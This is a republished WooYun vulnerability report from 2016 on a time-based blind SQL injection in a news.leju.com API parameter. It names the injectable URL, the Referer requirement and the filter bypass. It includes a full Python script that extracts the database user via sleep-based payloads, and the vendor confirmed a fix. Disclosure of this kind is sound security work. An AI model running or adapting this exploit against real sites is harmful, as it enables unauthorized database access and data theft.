新浪乐居某站SQL注入

admin

140559
文章

117
评论

2017年4月13日01:24:27评论371 views字数 236阅读0分47秒阅读模式

摘要

2016-04-01：细节已通知厂商并且等待厂商处理中
2016-04-01：厂商已经确认，细节仅向厂商公开
2016-04-06：厂商已经修复漏洞并主动公开，细节向公众公开

漏洞概要关注数(15) 关注此漏洞

缺陷编号： WooYun-2016-191359

漏洞标题：新浪乐居某站SQL注入

漏洞作者： null_z

提交时间： 2016-04-01 12:49

修复时间： 2016-04-06 10:57

公开时间： 2016-04-06 10:57

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：厂商已经修复

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+字符类型注射 Mysql

14人收藏

漏洞详情

披露状态：

2016-04-01：细节已通知厂商并且等待厂商处理中
2016-04-01：厂商已经确认，细节仅向厂商公开
2016-04-06：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

。。。

详细说明：

注入点 http://news.leju.com/api/data/gettaglists?category=1*&callback=_1459476097316824

注入参数 category

要带上referer http://news.leju.com/tag/

不能有空格，用＋

True

漏洞证明：

这个站很卡，所以我多加了个循环

版本

user

code 区域

#!/usr/bin/env python
 #-*- coding: utf-8 -*-
 
 
 import requests
 import time
 import string
 
 
 
 character = string.digits + string.ascii_lowercase + '._@ '
 res = ''
 
 headers = {
  'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.69 Safari/537.36',
  'Referer': 'http://news.leju.com/tag/',
  }
 
 
 for i in range(1, 21):
  for p in character:
   status = False
   while True:
    start_time = time.time()
    url = "http://news.leju.com/api/data/gettaglists?category='%2b(select(0)from(select(sleep((mid(user(),{},1)='{}')*4)))v)%2b'&callback=_1459476097316824".format(i, p)
    try:
     req = requests.get(url, headers=headers)
    except:
     pass
    else:
     print req.url
     if time.time() - start_time > 4:
      res += p
      print "/n" + res + "/n"
      status = True
      time.sleep(1)
      break
     break
    time.sleep(1)
   if status:
    break
 
 print "/n/n[Finish]: " + res

修复方案：

。。。

版权声明：转载请注明来源 null_z@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2016-04-01 14:06

厂商回复：

谢谢路人甲对乐居的关注，我们会尽快修复该漏洞

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-06 10:57 | 新浪乐居(乌云厂商)

1

谢谢关注，漏洞已修复

1# 回复此人
2016-04-06 12:38 | null_z ( 普通白帽子 | Rank:1012 漏洞数:115 )

1

@新浪乐居这站还有一处注入，参数 topxxxxx 我就不刷了。你们修复一下

2# 回复此人
2016-04-06 15:13 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白，外墙涂料，外墙保温，...)

2

为什么你这么牛？

3# 回复此人
2016-04-06 19:41 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

1

sqlmap 跑不出来么

4# 回复此人
2016-04-06 20:10 | null_z ( 普通白帽子 | Rank:1012 漏洞数:115 )

1

@Pzacker 有过滤，sqlmap可以识别是注入点，但是不出数据

5# 回复此人
2016-04-06 20:33 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

1

@null_z 怎么弄求解~

6# 回复此人

漏洞概要 关注数(15) 关注此漏洞